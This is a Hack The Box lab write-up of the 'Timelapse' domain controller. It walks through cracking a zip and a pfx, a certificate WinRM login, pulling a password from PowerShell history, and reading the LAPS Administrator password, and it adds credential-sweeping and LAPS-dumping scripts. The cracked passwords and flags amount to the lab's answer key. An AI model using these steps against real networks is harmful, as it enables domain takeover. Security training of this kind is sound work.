Timelapse – Hack The Box

Abusing LAPS Privileges

Task 1 – What is the common name on TLS/SSL certificate returned from one of the open TCP ports on Timelapse?

I started with an nmap scan:

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -sV -sC -sT 10.129.227.113
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-20 13:26 CET
Nmap scan report for 10.129.227.113
Host is up (0.056s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-02-20 20:27:35Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5986/tcp open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn: 
|_  http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
|_ssl-date: 2026-02-20T20:28:55+00:00; +7h59m56s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h59m55s, deviation: 0s, median: 7h59m55s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2026-02-20T20:28:15
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.00 seconds

The common name on the TLS/SSL certificate returned on port 5986 is dc01.timelapse.htb. Together with DNS (53), Kerberos (88) and LDAP/Global Catalog (389, 636, 3268, 3269), this tells us the host is a domain controller for timelapse.htb, and that port 5986 is WinRM over HTTPS. Two details from the scan matter later: the server certificate expired in October 2022, so any WinRM client will have to skip certificate validation, and the DC's clock is about eight hours ahead of Kali, which would break Kerberos authentication unless corrected (the NTLM and certificate-based WinRM logins used below are not affected).

Task 2 – What TCP port is SMB running on?

SMB is running on TCP port 445 (139 is the older NetBIOS session service). The scan also shows that SMB message signing is enabled and required, as expected on a domain controller, so NTLM relay to this host is not an option.

Task 3 – What tool from the John The Ripper tool suite can be used to generate a hash that can be used by John The Ripper from a password-protected zip file?

The tool is zip2john

Task 4 – What tool from the John The Ripper tool suite can be used to generate a hash that can be used by John The Ripper from a pfx file?

I didn't know what a pfx file is, so I started with some research.

A Personal Information Exchange (.pfx) file is Microsoft's name for a PKCS #12 archive: a single, password-protected container that can hold several cryptographic objects at once:

  • X.509 certificates (the end-entity certificate and, usually, its issuing chain)
  • the matching private key(s)
  • X.509 CRLs
  • generic data (attributes such as a friendly name)

PFX files are common for code signing, but they are also how Windows exports any certificate together with its private key, including certificates meant for TLS client authentication, which is exactly what turns up below. The other formats you meet, .pem, .cer and .crt, are encodings of a certificate on its own (PEM text or binary DER); openssl converts between them, and can split a .pfx back into a PEM certificate and a PEM private key.

The tool is pfx2john

Task 5 – What is the default port for the Windows Remote Management or WinRM service over HTTP (not HTTPS)?

The default port for WinRM over HTTP is 5985. WinRM over HTTPS uses 5986, which is the one open on this box.

Task 6 – Using Evil-WinRM, the -c flag will allow the user to provide a certificate. What flag can be used to provide a private key?

Looking at the Evil-WinRM help (evil-winrm -h), -k is the flag for the private key, paired with -c for the public certificate. Certificate authentication also needs -S, because WinRM only accepts client certificates over HTTPS.

Task 7 – User

Having answered all the questions, my attack path is to try to connect anonymously on port 445 and find a certificate to use with Evil-WinRM, but there is some cracking somewhere and I still don't know where.

I started enumerating shares using smbclient:

┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient -L //10.129.227.113
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Shares          Disk      
        SYSVOL          Disk      Logon server share 

Shares is the only non-default share, so I connected to it (again with an empty password) and found two folders:

┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient //10.129.227.113/Shares 
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Oct 25 17:39:15 2021
  ..                                  D        0  Mon Oct 25 17:39:15 2021
  Dev                                 D        0  Mon Oct 25 21:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 17:48:42 2021

                6367231 blocks of size 4096. 1335382 blocks available
smb: \> 

Inside Dev there is a zip file, winrm_backup.zip (fetched with smbclient's get). It is password-protected, so let's try to crack it. zip2john turns the archive's encryption metadata into a hash that john can work on:

┌──(kali㉿kali)-[~/Desktop/Timelapse/Dev]
└─$ zip2john winrm_backup.zip > ziphash.txt
Created directory: /home/kali/.john
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
                                                                                
┌──(kali㉿kali)-[~/Desktop/Timelapse/Dev]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt ziphash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)     
1g 0:00:00:00 DONE (2026-02-20 15:06) 3.333g/s 11578Kp/s 11578Kc/s 11578KC/s surkerior..superkebab
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

The password is supremelegacy

┌──(kali㉿kali)-[~/Desktop/Timelapse/Dev]
└─$ john --show ziphash.txt                                     
winrm_backup.zip/legacyy_dev_auth.pfx:supremelegacy:legacyy_dev_auth.pfx:winrm_backup.zip::winrm_backup.zip

1 password hash cracked, 0 left

Unzipping with the recovered password (unzip winrm_backup.zip) gives legacyy_dev_auth.pfx, which is itself password-protected. The same approach works, this time with pfx2john:

┌──(kali㉿kali)-[~/Desktop/Timelapse/Dev]
└─$ pfx2john legacyy_dev_auth.pfx  > pfxhash.txt
                                                                                
┌──(kali㉿kali)-[~/Desktop/Timelapse/Dev]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt pfxhash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 SSE2 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)     
1g 0:00:01:13 DONE (2026-02-20 15:11) 0.01367g/s 44190p/s 44190c/s 44190C/s thuglife06..thug211
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                
┌──(kali㉿kali)-[~/Desktop/Timelapse/Dev]
└─$ john --show pfxhash.txt                                     
legacyy_dev_auth.pfx:thuglegacy:::::legacyy_dev_auth.pfx

1 password hash cracked, 0 left

The PFX password is thuglegacy. Note the difference in cost: the PKCS#12 key derivation runs 2000 iterations, so john managed roughly 44 thousand candidates per second here against about 11 million for the zip.

Let's extract the private key. openssl prompts for the import password (thuglegacy; it can also be supplied with -passin pass:thuglegacy), and -nodes writes the key out unencrypted so Evil-WinRM can load it directly. One caveat for OpenSSL 3.x: a PFX exported by Windows may be encrypted with the legacy RC2-40 cipher, and if openssl refuses it with an "unsupported" error, add -legacy to both of the following commands.

┌──(kali㉿kali)-[~/Desktop/Timelapse/Dev/pfx]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -nodes -out key.pem  

Let’s extract the Certificate:

┌──(kali㉿kali)-[~/Desktop/Timelapse/Dev/pfx]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.pem

We still need a username. Certificates issued for client authentication normally carry the identity they map to, so let's read the certificate:

┌──(kali㉿kali)-[~/Desktop/Timelapse/Dev]
└─$ openssl x509 -in cert.pem -text -noout                                
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            1d:99:89:29:8a:cf:11:bb:41:93:a1:cf:f4:4e:12:df
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: CN=Legacyy
        Validity
            Not Before: Oct 25 14:05:52 2021 GMT
            Not After : Oct 25 14:15:52 2031 GMT
        Subject: CN=Legacyy
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Modulus:
                    00:a5:56:07:a3:62:16:47:1e:e2:f3:4d:23:ad:61:
                    71:ce:8b:9e:b3:4a:87:2b:f6:89:bc:e7:86:03:bb:
                    fe:aa:1c:16:b8:35:ff:31:14:fe:88:34:d0:4d:95:
                    85:af:03:10:af:28:cf:1a:42:c1:e9:bf:7b:68:a7:
                    0a:50:f9:86:d1:64:3b:b5:37:1c:a1:bd:f3:4d:4d:
                    15:e3:74:54:15:f6:72:22:2a:4a:30:3a:de:a0:1b:
                    61:7e:f4:ee:60:54:5e:0f:02:71:cf:9b:e6:18:3f:
                    0b:1b:a1:19:18:57:c4:0e:a7:32:22:e8:d3:19:80:
                    30:89:ae:02:12:59:99:94:1e:a4:e1:c9:b1:56:ff:
                    b3:ce:99:ed:60:b3:ab:62:37:55:c5:a0:fb:b5:cc:
                    d3:98:68:82:f7:76:d6:5a:6b:35:dc:2f:0e:88:a5:
                    32:51:3c:90:16:1a:db:6a:c8:5a:26:99:8a:c9:a8:
                    2c:c2:49:a5:ae:f6:31:b4:a7:58:4a:2b:b9:a4:eb:
                    0b:c1:49:1f:10:7c:75:b6:a9:7f:7e:35:b2:ca:7a:
                    00:ad:fb:f8:c0:6b:ab:b6:57:d9:6e:f8:ad:cc:0b:
                    63:5a:4b:33:a8:22:2e:47:2c:c8:e7:ae:e8:d1:a0:
                    2c:77:bf:a6:57:2f:42:8f:08:5c:c3:30:4a:8b:14:
                    91:f1
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Key Usage: critical
                Digital Signature, Key Encipherment
            X509v3 Extended Key Usage: 
                TLS Web Client Authentication
            X509v3 Subject Alternative Name: 
                othername: UPN:legacyy@timelapse.htb
            X509v3 Subject Key Identifier: 
                CC:D9:0E:E4:AF:20:9E:B0:75:2B:FD:81:96:1E:AC:2D:B1:25:58:19
    Signature Algorithm: sha256WithRSAEncryption
    Signature Value:
        5f:8e:fb:76:bf:de:3e:fe:96:fd:da:72:c8:4b:8a:e7:6b:b0:
        88:2a:ba:9a:9b:de:ba:1f:c9:05:ea:de:e9:1d:93:e5:10:36:
        4c:af:5e:ee:e7:49:2f:4c:dd:43:e0:fb:65:0a:e7:7d:49:a3:
        ec:a2:44:9b:28:da:05:81:7d:4a:35:7e:66:ef:61:74:dc:a0:
        8b:22:68:75:cf:89:6d:c6:c7:3a:26:03:a0:9d:c0:aa:74:57:
        d7:de:dd:04:cb:74:7b:28:6c:7a:ad:e2:ed:bd:4e:05:67:e9:
        e1:be:55:d3:78:9f:cf:01:77:3f:7f:06:b6:ad:f8:8f:b1:f5:
        79:d5:64:ce:60:4c:dc:82:99:e0:74:72:6d:06:a9:ae:37:0d:
        ed:9c:42:a6:80:ca:a9:eb:92:98:ce:92:93:be:f3:35:26:38:
        48:e6:dc:46:86:a6:dd:59:b9:f6:95:2e:30:8c:6c:b7:60:64:
        59:c3:aa:0c:eb:ae:c6:17:5d:d5:ab:65:f7:58:76:4a:e4:d6:
        8f:fb:92:9a:c1:df:c9:f8:cb:3a:ae:26:34:3c:36:e1:9f:1d:
        78:de:f2:22:a0:76:0c:88:60:a7:2a:c1:dd:5a:23:2b:1b:65:
        16:2c:ea:1e:52:b9:54:9a:9a:f4:eb:d9:18:fe:79:fb:fb:34:
        84:6b:6a:40

The certificate is self-signed (issuer and subject are both CN=Legacyy), its Extended Key Usage is TLS Web Client Authentication, and the Subject Alternative Name carries the user principal name legacyy@timelapse.htb. The UPN is what WinRM maps the certificate to, so the account is legacyy. Let's try to log in with what we have so far; -S is required because certificate authentication only works over HTTPS (5986), and Evil-WinRM does not validate the DC's expired server certificate:

┌──(kali㉿kali)-[~/Desktop/Timelapse/Dev/pfx]
└─$ evil-winrm -S -i 10.129.227.113 -u legacyy -c cert.pem -k key.pem 

The user flag

The flag is 28a1e8c0bcdf0648da478ac0dc62f5d2

Task 8 – What is the full path used to read PowerShell history file, starting from $env:?

I first tried enumerating the environment variables:

*Evil-WinRM* PS C:\Users\legacyy\desktop> Get-ChildItem Env:

Name                           Value
----                           -----
ALLUSERSPROFILE                C:\ProgramData
APPDATA                        C:\Users\legacyy\AppData\Roaming
CommonProgramFiles             C:\Program Files\Common Files
CommonProgramFiles(x86)        C:\Program Files (x86)\Common Files
CommonProgramW6432             C:\Program Files\Common Files
COMPUTERNAME                   DC01
ComSpec                        C:\Windows\system32\cmd.exe
DriverData                     C:\Windows\System32\Drivers\DriverData
LOCALAPPDATA                   C:\Users\legacyy\AppData\Local
NUMBER_OF_PROCESSORS           2
OS                             Windows_NT
Path                           C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\legacyy\AppData\Local\Microsoft\WindowsApps
PATHEXT                        .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
PROCESSOR_ARCHITECTURE         AMD64
PROCESSOR_IDENTIFIER           AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
PROCESSOR_LEVEL                25
PROCESSOR_REVISION             0101
ProgramData                    C:\ProgramData
ProgramFiles                   C:\Program Files
ProgramFiles(x86)              C:\Program Files (x86)
ProgramW6432                   C:\Program Files
PSModulePath                   C:\Users\legacyy\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
PUBLIC                         C:\Users\Public
SystemDrive                    C:
SystemRoot                     C:\Windows
TEMP                           C:\Users\legacyy\AppData\Local\Temp
TMP                            C:\Users\legacyy\AppData\Local\Temp
USERDNSDOMAIN                  TIMELAPSE.HTB
USERDOMAIN                     TIMELAPSE
USERNAME                       legacyy
USERPROFILE                    C:\Users\legacyy
windir                         C:\Windows

However, the question asks for the default path; after some research I found:

$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

PSReadLine, the module behind command-line editing in PowerShell 5 and later, appends every interactive command to this per-user file. On this box $env:APPDATA is C:\Users\legacyy\AppData\Roaming, as the listing above shows, which gives the absolute path used next.

Task 9 – What user’s password can be found in that PowerShell history file?

I then printed the PowerShell history:

*Evil-WinRM* PS C:\Users\legacyy\desktop> cat C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

The user is svc_deploy: the history shows a PSCredential being built from the plaintext password E3R$Q62^12p7PLlC%KWaxuaV and used for a WinRM session to localhost over 5986. The session options that skip the CA, CN and revocation checks are consistent with the expired server certificate seen in the scan, and the final get-aduser call hints that this account can read more of the directory than legacyy can.
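Reading one user's history by hand is enough for a box; on an engagement, or as a defender auditing a host, you want the same check across every profile. The PowerShell below is an added example and not part of the original write-up: it walks all user profile directories, reads each PSReadLine history file the current user can access, and flags lines that look like credential material. The regex patterns are my own choice, not a complete list.

```powershell
# Added example, not from the original write-up. Sweeps every profile's PSReadLine
# history for lines that look like credential material. The patterns below are
# my own choice; extend them for the tooling you expect to see on a host.

function Get-PSHistoryCredentialHits {
    param(
        # Where user profiles live; C:\Users on a default install.
        [string]$ProfileRoot = (Join-Path $env:SystemDrive 'Users')
    )

    # PSReadLine's default history location, relative to each profile.
    $relative = 'AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'

    # Constructs that commonly carry a plaintext secret in interactive history.
    $patterns = @(
        'ConvertTo-SecureString',
        '-AsPlainText',
        'PSCredential',
        'net\s+user\s+\S+\s+\S+',     # net user <name> <password>
        'runas\s+/user',
        'passw(or)?d\s*[:=]'
    )
    $regex = $patterns -join '|'

    foreach ($userDir in Get-ChildItem -Path $ProfileRoot -Directory -ErrorAction SilentlyContinue) {
        $historyFile = Join-Path $userDir.FullName $relative
        # Other users' files are only readable with sufficient privilege; skip quietly.
        if (-not (Test-Path -LiteralPath $historyFile)) { continue }
        Select-String -LiteralPath $historyFile -Pattern $regex -ErrorAction SilentlyContinue |
            ForEach-Object {
                [pscustomobject]@{
                    User = $userDir.Name
                    Line = $_.LineNumber
                    Text = $_.Line.Trim()
                }
            }
    }
}

# Usage from the Evil-WinRM prompt. As legacyy only that profile's file is readable;
# as svc_deploy or Administrator the sweep covers every profile on the host.
Get-PSHistoryCredentialHits | Format-Table -AutoSize -Wrap
```

Run as legacyy this returns the svc_deploy lines shown above; run it again once you hold a higher-privileged session, since the history files of other users are only readable with admin rights. Select-String reports the line number, so each hit can be reviewed in context rather than trusting the pattern alone.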

Task 10 – What non-standard group is svc_deploy a part of?

We can get the user’s group using the following command:

*Evil-WinRM* PS C:\Users\legacyy\desktop> Get-ADUser svc_deploy -Properties MemberOf | Select-Object -ExpandProperty MemberOf
CN=LAPS_Readers,OU=Groups,OU=Staff,DC=timelapse,DC=htb
CN=Remote Management Users,CN=Builtin,DC=timelapse,DC=htb

svc_deploy is a member of LAPS_Readers, a custom group under OU=Groups,OU=Staff. Remote Management Users is a built-in group (it is what allows the account to use WinRM), so it does not count as non-standard.

Task 11 – What is the acronym LAPS short for?

LAPS is short for Local Administrator Password Solution. It sets a unique, random password for the local Administrator account of each managed domain-joined computer, stores that password on the computer's own AD object, and rotates it on a schedule, so that one compromised local admin password cannot be reused across the fleet.

Task 12 – What is the name of the property on an active directory computer object that contains the LAPS-generated password for the administrator account?

After some research, I found that the attribute on the computer object that holds the LAPS-generated password is ms-Mcs-AdmPwd (legacy LAPS; its companion ms-Mcs-AdmPwdExpirationTime holds the next rotation time). The attribute is marked confidential in the schema, so only principals explicitly granted the read right on it, such as members of LAPS_Readers here, get a value back; everyone else sees it as empty.

Task 13- Root Flag

First we need a session as svc_deploy, either a fresh login or runas from legacyy's shell; then we can query LAPS.

We can log in using the password found in PowerShell history:

┌──(kali㉿kali)-[~/Desktop/Timelapse/Dev/pfx]
└─$ evil-winrm -i 10.129.227.113 -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

We can get the LAPS password using the following command:

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-ADComputer DC01 -Properties ms-mcs-admpwd | Select-Object Name,ms-mcs-admpwd

Name ms-mcs-admpwd
---- -------------
DC01 63%/G{L-}(hl.@yS1hpX}KLe

This is the password LAPS set for the Administrator account on DC01. Because DC01 is a domain controller, which has no separate local user accounts, the account being managed is the domain's built-in Administrator, so the credential is valid across the domain. LAPS rotates it once ms-Mcs-AdmPwdExpirationTime passes (30 days by default), so it should not be relied on for persistence.
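The single Get-ADComputer call above reads one computer. LAPS read rights are usually granted on an OU rather than a single object, and the other half of the picture is which principals hold them. The PowerShell below is an added example, not part of the original write-up, and generalises both: it lists every computer whose ms-Mcs-AdmPwd the current user can read, decoding the rotation deadline from its FILETIME value, and it reads an object's ACL to show who holds the read / control-access right on that attribute. It assumes the ActiveDirectory module and its AD: drive are available, as the Get-ADUser call above shows they are on DC01.

```powershell
# Added example, not from the original write-up. Assumes the ActiveDirectory
# module (and its AD: PSDrive) is loaded, as it is on DC01.

function Get-LapsPasswords {
    # Every computer in scope whose legacy-LAPS password the caller is allowed to read.
    param([string]$Filter = '*')

    Get-ADComputer -Filter $Filter -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime |
        Where-Object { $_.'ms-Mcs-AdmPwd' } |   # the attribute comes back empty without the right
        ForEach-Object {
            $ft = $_.'ms-Mcs-AdmPwdExpirationTime'
            [pscustomobject]@{
                Computer = $_.Name
                Password = $_.'ms-Mcs-AdmPwd'
                # Expiration is a Windows FILETIME: 100 ns ticks since 1601-01-01 UTC.
                Expires  = if ($ft) { [DateTime]::FromFileTimeUtc([int64]$ft) } else { $null }
            }
        }
}

function Get-LapsReaders {
    # Principals whose ACEs on an object (direct or inherited) let them read the LAPS password.
    param([Parameter(Mandatory)][string]$DistinguishedName)

    # The ACE is scoped to the schema GUID of ms-Mcs-AdmPwd; look it up instead of hard-coding it.
    $schemaNC = (Get-ADRootDSE).schemaNamingContext
    $attrObj  = Get-ADObject -SearchBase $schemaNC -Filter "name -eq 'ms-Mcs-AdmPwd'" -Properties schemaIDGUID
    $lapsGuid = [guid]$attrObj.schemaIDGUID
    $rights   = [System.DirectoryServices.ActiveDirectoryRights]
    # Reading a confidential attribute needs CONTROL_ACCESS, so LAPS grants
    # ReadProperty + ExtendedRight on the attribute; GenericAll on the object also suffices.
    $lapsRead = $rights::ReadProperty -bor $rights::ExtendedRight
    $allProps = [guid]::Empty   # ObjectType of all zeros means "every property"

    (Get-Acl -Path "AD:\$DistinguishedName").Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and (
                ($_.ObjectType -eq $lapsGuid -and ([int]($_.ActiveDirectoryRights -band $lapsRead)) -ne 0) -or
                ($_.ObjectType -eq $allProps -and ($_.ActiveDirectoryRights -band $rights::GenericAll) -eq $rights::GenericAll)
            )
        } |
        Select-Object IdentityReference, ActiveDirectoryRights, IsInherited, InheritanceType
}

# Usage: dump what the current user may read, then see who else can read DC01's entry.
Get-LapsPasswords | Format-Table -AutoSize
Get-LapsReaders -DistinguishedName (Get-ADComputer DC01).DistinguishedName | Format-Table -AutoSize
```

Run as svc_deploy, the first call returns DC01 with the password shown above and its expiry; the second lists LAPS_Readers (via the inherited ACE that grants it ReadProperty and ExtendedRight on ms-Mcs-AdmPwd) alongside the Domain Admins / SYSTEM entries that hold GenericAll. The ACL query works for any user, so on an engagement it is also the quickest way to discover which low-value group has quietly been handed LAPS read rights.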

We can then login using the Administrator credentials:

┌──(kali㉿kali)-[~/Desktop/Timelapse/Dev/pfx]
└─$ evil-winrm -i 10.129.227.113 -u 'Administrator' -p '63%/G{L-}(hl.@yS1hpX}KLe' -S

The flag is 97d3f7b95fa349b903b7bc38aa595baa